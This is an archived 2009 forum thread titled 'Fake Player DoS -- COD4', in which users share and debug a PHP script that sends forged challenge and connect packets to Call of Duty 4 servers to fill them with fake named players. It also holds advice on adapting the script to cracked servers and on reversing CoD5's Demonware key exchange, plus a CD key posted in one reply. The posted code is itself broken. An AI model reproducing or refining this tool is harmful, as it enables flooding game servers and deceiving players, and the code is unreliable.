Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 13:16

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 121 posts ]  Go to page Previous  1, 2, 3, 4, 5  Next
Author Message
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 07 May 2009 00:29 

Joined: 29 Apr 2009 19:30
Posts: 11
Bye


Last edited by mikevercoelen on 20 Oct 2010 15:53, edited 1 time in total.

Top
 Profile  
 
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 08 May 2009 13:27 

Joined: 29 Apr 2009 20:42
Posts: 8
After correct all commas and so.

Code:
<?php

   /*
   *    Mike Vercoelen (C)
   *   Credits to SomaFM
   *   2009 - 2010 All rights reserved.
   */
   
   // Small configuration properties.
   $clientGuid       = "1234567890abcdef1234567890abcdef";
   $clientSerial       = "XXXX-XXXX-XXXX-XXXX";
   $serverIp       = "00.00.00.00";
   $serverPort       = "28960";
   
   // These properties are used for our script. Leave them.
   $fakePlayerCount    = 0;
   $realPlayerCount    = 0;
   $fakePlayersAdded    = 0;
     
   // Open a new socket to the target server.
   $socketToTargetServer = fsockopen("udp://" . $serverIp, $serverPort);
   
   // Open a new socket to the master server.
   $socketToMasterServer = fsockopen("udp://cod4master.activision.com", "20800");   
   
   if($socketToTargetServer == null || $socketToMasterServer == null)
   {
      // Display our user something.
      logError("The socket to the target server or master server could not be opened. Please check your serverIP/serverPort.");
     
      // And stop.
      return;
   }
   
   // So if we continue, the sockets are opened and running.
//   logWarning("Socket to target server and master server are established.");
   
   // Write to the master call of duty 4 server that we want to check if our serial is valid with our guid.
   // If so yes, continue.
   // We don't read the reply, we'r not interested in this.
   fwrite($socketToMasterServer, "\xff\xff\xff\xffgetKeyAuthorize 0 " . $clientSerial . " PB " . $clientGuid);
   
        while(0 == 0)
        {
          playerMechanic();
        }
   
   function playerMechanic()
   {
      $playersOnServer = getPlayerCount();
      $realPlayerCount = $playersOnServer - $fakePlayerCount;
     
      if($realPlayerCount < 10)
      {
         addPlayer();
      }
   }
   
   function addPlayer()
   {
      // Then we want to notify our target server that we are comming.
      fwrite($socketToTargetServer, "\xff\xff\xff\xffgetchallenge 0 " . $clientGuid);
     
      // Give a name to our fake player.
      $fakePlayerName = generateFakePlayerName();
     
      // We set a stream time out for the socket to our target server.
      stream_set_timeout($socketToTargetServer, 1);
     
      // Read our reply from the target server and put it in variable $strRespone.
      $strRespone = fread($socketToTargetServer, 1400);
     
      // We wanna know the status of the target server, so we can interact with it.
      $targetServerStatus = stream_get_meta_data($socketToTargetServer);
     
      if ($targetServerStatus['timed_out'])
      {
         logError("Fake player could not be added because of the socket timed out.");
      }
      else
      {
         // If the RESULT was NOT challengeRespone, in other words NOT succeeded.
         if(substr($strRespone, 0, 21) != "\xff\xff\xff\xffchallengeResponse")
         {
            if($strRespone == "\xff\xff\xff\xffneedcdkey")
            {
               // Display a message.
               logError("Target server replied with needcdkey so we have resended cd key to master server.");
               
               // And resend our key, guid to master server.
               fwrite($socketToMasterServer, "\xff\xff\xff\xffgetKeyAuthorize 0 " . $clientSerial . " PB " . $clientGuid);
            }
            else
            {
               if($strRespone == "\xff\xff\xff\xfferror\x0aEXE_ERR_CDKEY_IN_USE")
               {
                  // Display a message.
                  logError("Target server replied with serial key already in use.");
               }
               else
               {
                  logError("Target server replied with unknown reply.");
               }
            }
         }
         else
         {
            // We add a player.         
           
            $strChallengeRespone = substr($strRespone, 22, 20);
           
            $strPlayerConnection = "\xff\xff\xff\xffconnect\\
            cg_predictItems\\1
            \\cl_anonymous\\0
            \\cl_punkbuster\\1
            \\cl_voice\\1
            \\cl_wwwDownload\\1
            \\rate\\25000
            \\snaps\\20
            \\name\\" . $fakePlayerName . "
            \\protocol\\6
            \\challenge\\" . $strChallengeRespone . "
            \\qport\\" . rand(10000, 65534) . "";
           
            // Execute our strings to our socket.
            fwrite($socketToTargetServer, $strPlayerConnection);
           
            // Read our final respone.
            $strFinalRespone = fread($socketToTargetServer, 1400);
           
            if($strFinalRespone == "\xff\xff\xff\xffconnectResponse\x20")
            {
               logWarning("Fake player" . $fakePlayerName . " added to target server.");
               $fakePlayersAdded++;
            }
            else
            {
               switch($strFinalRespone)
               {
                  case "\xff\xff\xff\xfferror\x0aEXE_SERVERISFULL":
                     logError("Target server replied server is full.");
                     break;
                 
                  case "\xff\xff\xff\xfferror\x0aYou have been BANNED":
                     logError("Target server replied you have been banned.");
                     break;
                 
                  case "\xff\xff\xff\xffconnectResponse\x20mods":
                     logError("Target server replied that it runs a mod that you don't have.");
                     break;
                 
                  case "\xff\xff\xff\xfferror\x0aEXE_ERR_LOW_PING_ONLY":
                     logError("Target server replied that your ping is too high.");
                     break;
                 
                  case "\xff\xff\xff\xfferror\x0aGAME_INVALIDPASSWORD":
                     logError("Target server replied that server password was invalid.");
                 
               }
            }
         }
      }
   }
   
   
   
   function logMessage($strInput)
   {
      // Example output: [21:03][Message]: Hello World.
      echo "[" . date("H:i") . "]" . "[Message]:" . $strInput . "\n";
   }
   
   function logError($strInput)
   {
      // Example output: [21:03][Message]: Hello World.
      echo "[" . date("H:i") . "]" . "[Error]:" . $strInput . "\n";
   }   
   
   function getPlayerCount()
   {
      // Getinfo is the short version of getstatus, which contains number of players instead of full names.
      fwrite($socketToTargetServer, "\xff\xff\xff\xffgetinfo");
     
      // Read the incoming data, and parse it into a variable.
      $strRespone = fread($socketToTargetServer, 1400);
     
      // Lets strip all the \'s from our $strRespone.
      // We explode two times a \ because the first \ means in PHP that a \ is comming.
      $strStrippedRespone = explode("\\", $strRespone);
     
      // We define the POSITION of the number in the array into a variable.
      $positionInStrippedRespone = array_search("clients", $explodedRespone) + 1;
     
      // Return this value, would return for example 3 or 7.
      return $strStrippedRespone[$positionInStrippedRespone];         
   }
   
   function generateFakePlayerName()
   {
      // This is the array that contains all our random names.
      $arrNames = array(

                       "fly",

                       "??pium",

                       "[11]glyhigh'",

                       "55th|supah",

                       "pandemic prank`",

                       "esuba' Lucker",

                       "skill>l33t",

                       ":P'Owner:",

                       "BB|goliot",

                       "aG.L4stknight",

                       "revol<3",

                       "[vg]Frst",
                       "[11]glyhigh'",

                       "cr33p inct'v",

                       "=TFF=MinuteMan",

                       "shox",

                       "Bodyguard#",

                       "phnyyyyyyyyyyyy",

                       "Local",

                       "(LZ) Tr3n",

                       "eZ0o_",

                       "Interc3pt0r",

                       "[K9] EnV0ltA",

                       "LoL.mp",

                       "eMuda.Mandar1ni",

                       "Jo!Ntzz",

                       "Death Magnet1c",

                       "St1flersMum",

                       "Virtue.Drush",

                       "Kqp",

                       "<-Low",

                       "h4ns",

                       "Pown-D.D&B",

                       "Kr0ketje1.",

                       "scrappycoco",

                       "-=SnF=-STIN",

                       "Accce",

                       "element0",

                       "|IF|Kebe",

                       "|IF|SadiC",

                       "#MHB::Sho0ter",

                       "#MHB::Urwan",

                       "(-GPS-)Own3d",

                       "[C.SF.]boreas",

                       "SOLO",

                       "Berta incazz0so",

                       "cabutssss",

                       "daro",

                       "[SdF] GhOsT!",

                       "MA3EH_HEPE",

                       "Moron",

                       "McLovin",

                       "=OSM=Amantis",

                       "BrotherS|KAM!L3",

                       "*R!P* ZDRAWEX",

                       "^6???",

                       "WdC|.Vig",

                       "z0h4n",

                       "mordshase",

                       "m0u",

                       "Wac Emigration",

                       "BrotherS|NuK3",

                       "DoggyFashion",

                       "[SWL]MadToni",

                       "[KUR!] Walkuere",

                       "Lisa :)",

                       "]PBC[ Pvt.Paula",

                       "[k0|LeckSieKon]",

                       "[DFF]D4rk",

                       "WdC|.Myros",

                       "Alam",

                       "<cH0p Ch0P>",

                       "FG' SoNNy",

                       "Lucker.Pro <3",

                       "Where",

                       "=TCFF=MinuteMan",

                       "GL-MAFIA",

                       "ubojica",

                       "thoMPson",

                       "NAPUSENA KAMILA",

                       "|AFK|bidzy",

                       "d2T.TurboHIGH",

                       "{silk}AxE",

                       "Ruzno pace",

                       "exor",

                       "[1oolac] haTa*",

                       "b4rr4",

                       "=TCFF=^");

           
               // Let the CPU wait for a small time.

                 srand((double)microtime() * 10000000);
                 
                 // Pick a random element from array $arrNames, this returns a integer.

                 $namePosition = array_rand($arrNames, 1);
                 
                 // The $name from array $arrNames, example: $arrNames[3] which is [11]glyhigh'.

                 return $arrNames[$namePosition];
   }
?>


There is a fault in the script:

Code:
./php IP PORT KEY

Warning: fwrite(): supplied argument is not a valid stream resource in file.php on line 182

Warning: fread(): supplied argument is not a valid stream resource in file.php on line 185

Warning: array_search(): Wrong datatype for second argument in file.php on line 192

Warning: fwrite(): supplied argument is not a valid stream resource in file.php on line 62

Warning: stream_set_timeout(): supplied argument is not a valid stream resource
in file.php on line 68

Warning: fread(): supplied argument is not a valid stream resource in file.php on line 71

Warning: stream_get_meta_data(): supplied argument is not a valid stream resourc
e in file.php on line 74
[14:37][Error]:Target server replied with unknown reply.


Last edited by Buggy on 09 May 2009 22:55, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 08 May 2009 20:17 

Joined: 29 Apr 2009 19:30
Posts: 11
Try to chmod to 777, or try another webhost, it depends on the server.


FAIL - $clientSerial = "22JQ-S4WY-2TUY-STLJ-A4C6";


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 09 May 2009 06:22 

Joined: 12 Jan 2009 01:49
Posts: 6
I'm getting this: [Error]:Target server replied with unknown reply.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 09 May 2009 23:04 

Joined: 29 Apr 2009 20:42
Posts: 8
i've tested my original guid and serial but the fault is the same!
And i tested on other server and platforms, too!
Do you have any help or bugfixes?


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 13 May 2009 22:41 

Joined: 17 Apr 2009 22:04
Posts: 8
i have created a script that checks the server every 60 seconds for players and adds them. the disconnect happens by the server there is a value in the config file. basically the players have to time out.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 14 May 2009 21:51 

Joined: 29 Apr 2009 20:42
Posts: 8
can you make it online? is it a real populating script? it works also for cod waw?


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 15 May 2009 09:27 

Joined: 14 May 2009 09:06
Posts: 3
i tried it on my original server and it worked but when i try it on my cracked server it didnt, i also tried other few cracked server but it doesn't work , only gives set of "c"s. is there anyway to make this work on cracked servers? thx


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 15 May 2009 18:21 

Joined: 17 Apr 2009 22:04
Posts: 8
Buggy wrote:
can you make it online? is it a real populating script? it works also for cod waw?



as soon as i finish debugging it since i rewrote it as an exe instead of php and no it wont work with world at war i am still trying to figure out the demonware stuff. as soon as i do i will let you all know

I can get the connect data just cant automate it yet,


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 15 May 2009 22:37 

Joined: 16 Aug 2007 06:25
Posts: 367
Nubus wrote:
i tried it on my original server and it worked but when i try it on my cracked server it didnt, i also tried other few cracked server but it doesn't work , only gives set of "c"s. is there anyway to make this work on cracked servers? thx


"c" with my code means it timed out when requesting the challenge. Since cracked servers probably bypass a lot of authentication, key checking, etc... chances are the seqeuence of connection packets are much different on cracked servers. A little packet sniffing while using a cracked client connecting to a cracked server would reveal a lot about how it's done. Or you can upload a pcap from Wireshark or something similar while you connected to a server so I can take a look. I don't mess around with cracked clients/servers so I couldn't say for sure.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 15 May 2009 23:13 

Joined: 12 Jan 2009 01:49
Posts: 6
aclure wrote:
as soon as i finish debugging it since i rewrote it as an exe instead of php and no it wont work with world at war i am still trying to figure out the demonware stuff. as soon as i do i will let you all know

I can get the connect data just cant automate it yet,

I want the CoD4 script more than a waw script so thanks in advance for sharing it with us.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 16 May 2009 09:23 

Joined: 14 May 2009 09:06
Posts: 3
SomaFM wrote:

Or you can upload a pcap from Wireshark or something similar while you connected to a server so I can take a look. I don't mess around with cracked clients/servers so I couldn't say for sure.


i used commview to capture packets while connecting to cracked server , which type (text , tcpdump , NAI sniffer , binary,etc..) should i save those packets and upload?

it would be really great if this script can be worked on my cracked server . thanks.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 16 May 2009 11:35 

Joined: 29 Apr 2009 20:42
Posts: 8
Now i find the firm, which makes fake players for cod waw gameserver.
I asked them about the price. Its NOT NORMAL! $75 per month per server!!!!!
We need a funtionally script which makes connecting bots to popular cod4 and cod waw gameservers!
Thanks all!


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 16 May 2009 13:28 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
that's a good price for dishonest admins like you (you as plural)...
*edit* I already expressed my negative opinion about the server's fake populating (which imho it's also totally useless because only the stupid players can fall in the "trap") in the past


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 16 May 2009 23:17 

Joined: 16 Aug 2007 06:25
Posts: 367
Nubus wrote:
i used commview


- Get wireshark here: http://www.wireshark.org
- Scan on your current network interface while you connect to a server. Start scanning before you connect so you can get all the packets.
- Once you are connected, stop the capture. Now right click on one of the packets you know is in the stream (there will be many, but any of them works) and choose 'follow udp stream'. Now it will show just those packets from that stream, and not all the packets during the entire sniffing session.
- Choose file > save as. Click the "displayed" radio button at the bottom left so you only save those packets that are displayed. And the file type should be .pcap, which I think is the default.
- Find a place to host your pcap file, or maybe you can zip it and upload it on the forums (though I'm not sure what extensions Luigi allows).

Or if commview can save files in pcap format that would be fine too... or if the plain text that you mentioned is 'neat' to read...then just put it on pastebin. I couldn't guarantee that wireshark would open any of those other types, so pcap or plain text would be best.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 18 May 2009 12:40 

Joined: 14 May 2009 09:06
Posts: 3
hi ,

i captured packets as u stated, ill attach them to this post. thanks xD


Attachments:
cracked cod4.rar [117.49 KiB]
Downloaded 278 times
Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 19 May 2009 05:17 

Joined: 16 Aug 2007 06:25
Posts: 367
Looks like the exact same packets used on normal servers. The only thing I noticed was that the client had to request a challenge 6 times before the server responded. This was also the case when my client tried on that same server. Seems to be a server side issue or modification. It shouldn't take 6 requests to get a challenge. You will have to modify my code so it doesn't timeout when requesting a challenge ("c").. but even then, your fake players will be a bit slow since the server takes 6 requests to reply.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 27 Jun 2009 13:30 

Joined: 27 Jun 2009 12:58
Posts: 3
ok i'm new to php can someone explain how i use one of theese scripts, i can compile it by pasting into notepad and changing the file extension to php i got that far, now where do i put it, i have tried it on my website and its seems to know its there (there is php on my site btw) and when i open it i always everytime get errors the latest being from the ogirinal script this is, "Check your arugments. Must start like: file.php cod4server cod4serverport key " does this mean i meen to call it something inparticular i have filled it in with my cd and guid could someone explain what the first 16 thing is does the error suggest i need to name is something certain or something, or..... could someone repost the original script with fake details filled in and then put it on here or pm it me or add me on xfire , thebllud.

ty


i have tried on all sorts of servers e.g. cracked legit modded full empty, please help me


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 28 Jun 2009 18:57 

Joined: 16 Aug 2007 06:25
Posts: 367
Check out my post here: post3401.html#p3401

It's better to run this through command line because through the browser you won't see the live results outputted by the script. For Windows, I usually go to php.net's download section... and get the zip package under the "Windows Binaries". Unzip it and navigate to your php.exe file through the command line (that's step 3 on the link I provided above).

Though my script is really just an example and shouldn't be used without some heavy modifications (because as we have discussed there are more replies a server can send the client that aren't handled).


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 30 Jun 2009 22:14 

Joined: 27 Jun 2009 12:58
Posts: 3
somafm thanks for the help, i have now got it working and have added the names to the original code, my question is now how do i change it to limit it to just,lets say 4 fakes, it doesnt need to check how many people are on the server, it only needs to be able to limit the number of fakes!

ty
in advanced


OR

since i have rcon control, is there a way of setting the bots just to connect to private slots and not the public ones?


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Jul 2009 19:29 

Joined: 16 Aug 2007 06:25
Posts: 367
I'm not sure about public vs private as I have never played around on the server side of things. As far as limiting the amount of fake players, it's tough because the players will time out on their own. Most likely they will timeout around the same time, but you can't guarantee a timeout as far as I know. What I would do is create 4 (or however many fake players you want) very unique nicknames that nobody else would use. Then modify the script to add those 4 players and keep checking the status (see page 3 of this topic on querying the server status). Once a player has left, re-add that unique player. There might be a very small time where the players are not in the server, but in theory it should work. You will also see annoying "Player has timed out..." messages which will annoy your visitors.

In my opinion, these types of fake players shouldn't be used to fill servers. You should use some other method that is more stable, like a mod. Though I'm not aware of any.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 04 Jul 2009 23:12 

Joined: 27 Jun 2009 12:58
Posts: 3
how much bandwidth does this use up, i don't know whats alot so lets say compared to actually playing cod4!


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Aug 2009 20:47 

Joined: 16 Aug 2007 06:25
Posts: 367
I commonly get PMs and questions about the controlling the fake players. I decided to modify the script to show some code as to how I might do it. Here is a link to that: http://pastebin.com/f1d006d22

What has changed from the original script:
- added the getcurrentplayers() function for parsing the current player count from a server's reply after sending "\xff\xff\xff\xffgetinfo xxx"
- before each fake player is added, it will query the server's current player count. if that number is less than 10 (default number in my example, you can change it to whatever you want) it will add a fake player...otherwise, it will do nothing except echo "q" which is just a random letter I chose. it will also sleep for 1 second if "q" is the case so your bandwidth isn't being sucked up because the script is constantly querying the server. you can change this if you need.
- if a timeout happens when requesting the current player count, "c" will be echoed, and no fake player will be added for that current loop.

Other than that, everything else is the same. Oh yes, my code "tabbing" is pretty unorganized :P... a bad habit of mine.. sorry.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Aug 2009 22:23 

Joined: 01 Aug 2009 19:06
Posts: 5
SomaFM,

I used that new PHP file you posted and got it setup to run in a .bat file that adds the server, ip and cdkey in it (instead of typing it everytime into the command prompt). It looks like it works as it should.. but whenever I run it on the server (the CoD4 server is on the same box that I am running the PHP file on), the server CI's (999 ping) for anyone connected.

Is there a fix or something I should look at for this?

The only modification I did to your PHP file was change the location of the cod4key2guid file.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Aug 2009 23:25 

Joined: 16 Aug 2007 06:25
Posts: 367
Hmm weird. Is the script outputting just . and q? That is all it should be outputting if everything is running normal. A "." for an added player, and a "q" for no player added because of the limit set in the script.

You could also check to see if there are any processes utilizing a bunch of memory or cpu usage that could be causing the high ping. Also, what does "CI's" mean?

I just tried the script on a local server and everything seemed to run fine, so I'm not too sure.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 02 Aug 2009 00:50 

Joined: 01 Aug 2009 19:06
Posts: 5
This is what is returned on the script:

C:\servers\php>php c:\playerfill\cod4filler\serverfill2.php 66.225.232.194 28961

vvvvvvvvvvvvvccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccvvv
vvvvvvvvvvccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccvvvvvv
vvvvvvvccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc

I removed the cd-key for obvious reasons. I used the IP address of the interface the server is on, since this server has multiple IP addresses on the same NIC card.

A "CI" is connection interrupted.. basically the server is lagged out, and your ping turns to 999 and you get no server response at all. I will try this from my computer and try to connect remotely and see if it works.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 02 Aug 2009 01:11 

Joined: 01 Aug 2009 19:06
Posts: 5
Ok I ran the PHP file on my PC and connected it to my server... and sure enough it works great. I think maybe the lagging has something to do with using the external IP address instead of something like 127.0.0.1?

Anyway, thanks for your help SomaFM!


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 02 Aug 2009 01:15 

Joined: 16 Aug 2007 06:25
Posts: 367
Interesting. Have you tried 127.0.0.1? If it's on the same machine, that would make the most sense to me... though I have never played with multiple IPs on the same NIC so I'm not sure if it would work correctly. Worth a shot though.


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 05 Sep 2009 06:59 

Joined: 01 Aug 2009 19:06
Posts: 5
Hey SomaFM, all has been working great so far with the CoD4 fake client that you helped me with last month.

I have been trying hard to get something working for CoD5. I read through this thread and how you were attempting to get the bdticket decrypted (I believe that is what you were trying to do..) and I am honestly stuck.

I used Wireshark to get the bdticket data after getting a response back from the server on connection, so I have that.

I have full access to the server box and I was unable to find any relevant data in the registry entries for the CoD5 patches (latest is 1.5 for the server).

Any additional knowledge you can throw at this would be greatly appreciated!

Bojangles


Top
 Profile  
 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 05 Sep 2009 18:39 

Joined: 16 Aug 2007 06:25
Posts: 367
Luigi's dwbdcrypto tool explains in detail how it works (http://aluigi.org/papers/dwbdcrypto.zip), but the only problem we come up with is obtaining the last 16 bytes of the server's cd-key. This is most likely done through Demonware when the client connects to the server, but the Demonware encryption is where we sort of gave up out of confusion. So it's somewhat like this:

Client -> Demonware "hey whats the partial cdkey for server 1.2.3.4:12345? last 16 bytes please"
Client <- Demonware "its 1234567890123456"
Client -> Server "id like to connect"
Client <- Server "heres your challenge... and the first 8 bytes of my cdkey 12345678"
Client -> Server "ok the connect string with the correctly generated bdticket is this"

In the latest versions of CoD5, the server appears to use a random cdkey on startup, so you would need to get it every time. I'm not sure where it's stored if you have full access to the server, probably only in memory somewhere since its randomly generated.

But once you have the full cd-key for the server, you should be good to generate the correct bdticket string. Luigi's tool above simulates what the server does in decrypting the string, so you would need to do the opposite of his tool to generate it.


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 121 posts ]  Go to page Previous  1, 2, 3, 4, 5  Next

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: